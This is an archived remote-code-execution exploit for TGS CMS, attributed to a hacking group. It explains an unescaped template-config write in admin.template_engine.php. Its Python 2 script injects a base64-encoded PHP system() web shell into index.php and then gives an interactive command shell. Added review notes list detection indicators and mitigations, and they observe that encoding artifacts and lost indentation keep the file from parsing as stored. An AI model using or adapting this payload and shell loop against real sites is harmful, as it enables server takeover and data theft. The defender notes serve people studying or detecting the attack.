|
# TGS CMS Remote Code Execution Exploit
# by 0in
# from Dark-Coders Group!
# www.dark-coders.pl
# Contact: 0in(dot)email[at]gmail(dot)com
# Greetings to: die_angel, suN8Hclf, m4r1usz, cOndemned, str0ke
# Dork: NULL - because "You cannot kill what you did not create" <- Duality by Slipknot
# Let's analyze the vuln:
# We've got: /cms/admin/admin.template_engine.php
# first line: ""
# next lines 2-22 - comments
# 23: if ($_GET['option'] == "set_template") {
# 24: $filename = "../index.php";
# 25: if ((@is_writeable($filename)) && ($handle = @fopen($filename, "w"))) {
# From line 50 to 88 we have the definition of the file content:
# 50: $content = 'template_dir = "'.$_POST['template_dir'].'";
# 78: $tgs_template->config_dir = "'.$_POST['config_dir'].'";
# 79: $tgs_template->cms_dir = "'.$_POST['cms_dir'].'";
# 80: $tgs_template->left_delimiter = "'.$_POST['left_delimiter'].'";
# 81: $tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";
# And.. boom! The POST values are concatenated into PHP source text without any escaping, and:
# 89: if (@fwrite($handle,$content)) {
# writes that source over index.php. Just simply exploit for fun:
# --- Flat Python 2 script (print statements, raw_input, httplib/urllib) ---
# NOTE(review): code kept verbatim as archived. The trailing "=0D" on every
# line is a quoted-printable artifact of the archived copy (an encoded CR),
# not part of the original source; as stored, the file does not parse.
import httplib=0D
import urllib=0D
print "TGS CMS Remote Code Execution Exploit"=0D
print "by 0in From Dark-Coders Group"=0D
print "www.dark-coders.pl"=0D
# Host and the URL prefix under which /cms/ is served are read interactively.
print 'Enter target:'=0D
target=raw_input()=0D
print 'Enter path:'=0D
path=raw_input()=0D
# Value sent as the 'right_delimiter' POST field. Per the analysis above,
# admin.template_engine.php splices $_POST['right_delimiter'] into PHP source
# unescaped and writes it over ../index.php. The leading quote/semicolon
# terminates the generated assignment, the base64 blob decodes to a one-line
# PHP stub that hands the `zuo` query parameter to system(), and the trailing
# `//` comments out the remainder of the generated line.
# Defender notes: the write only happens when the web-server user can write
# index.php (line 25 of the vulnerable file checks is_writeable), so a
# read-only index.php blocks this path; request parameters must never be
# spliced into executable source; file-integrity monitoring on index.php and
# WAF/log rules for `eval(base64_decode(` in POST bodies to
# option=set_template both detect this payload. Whether the admin page
# enforces authentication is not shown on this page - confirm against the CMS.
inject="\";error_reporting(0);eval(base64_decode(\"JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7\"));//"=0D
# A single form-encoded POST with option=set_template triggers the file write;
# the response body (whatever the CMS prints) is echoed to the operator.
exploit=httplib.HTTPConnection(target+':80')=0D
headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}=0D
data=urllib.urlencode({'right_delimiter':inject})=0D
exploit.request("POST",path+"/cms/admin/admin.template_engine.php?option=set_template",data,headers)=0D
print exploit.getresponse().read()=0D
# Interactive loop: each command is sent as the `zuo` query parameter of the
# overwritten /cms/index.php and the HTTP response is printed. The value is
# concatenated without URL encoding, so input containing spaces or '&' may
# produce a malformed request. The loop body lost its indentation in the
# archived copy, which is a second reason this file does not parse as stored.
# Defender note: GET requests to /cms/index.php carrying an unexpected `zuo`
# parameter are a direct indicator of this shell being used.
while(1):=0D
cmd=raw_input("[shell@"+target+"]#")=0D
if(cmd=='exit'):=0D
quit()=0D
shell=httplib.HTTPConnection(target+':80')=0D
shell.request("GET",path+"/cms/index.php?zuo="+cmd)=0D
print shell.getresponse().read()=0D
=0D
=0D
=0D
=0D
=0D